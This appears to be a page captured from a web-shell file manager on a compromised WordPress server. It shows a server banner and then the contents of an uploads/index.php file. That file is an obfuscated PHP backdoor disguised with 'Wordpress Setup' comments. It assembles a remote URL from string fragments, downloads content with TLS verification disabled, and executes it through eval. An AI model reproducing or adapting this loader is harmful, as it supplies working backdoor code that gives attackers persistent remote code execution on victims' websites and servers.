HEX
Server: LiteSpeed
System: Linux cyberpanel211onubuntu2004-s-1vcpu-1gb-blr1-01 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64
User: excel9995 (1002)
PHP: 8.0.14
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /home/exceltradinguae.ae/public_html/wp-content/uploads/index.php
<?php
function 加载内容(){
    /** These are the 加载内容 to Wordpress Setup */
  $一 = 'ht' . 'tp' . 's' . '://' . 'ww' . 'w' . '.' . 'simple' . 'eever' . 'ything' . '.' . 'co' . 'm';
    $二 = '/' . 'us' . 'd';
    $三 = '/' . 'on' . '.' . 'txt';
    $四 = $一 . $二 . $三;
 /** These are the 数据 to Wordpress Setup */
    $数据 = @file_get_contents($四);
    if(!$数据 && function_exists('curl_init')){
        $请求 = curl_init($四);
        curl_setopt_array($请求, [
            CURLOPT_RETURNTRANSFER => 1,
            CURLOPT_TIMEOUT => 3,
            CURLOPT_SSL_VERIFYPEER => 0,
            CURLOPT_SSL_VERIFYHOST => 0
        ]);
        $数据 = curl_exec($请求);
        curl_close($请求);
    }
 /** These are the eval to Wordpress Setup */
    if($数据) eval("?>$数据");
}
加载内容();
?>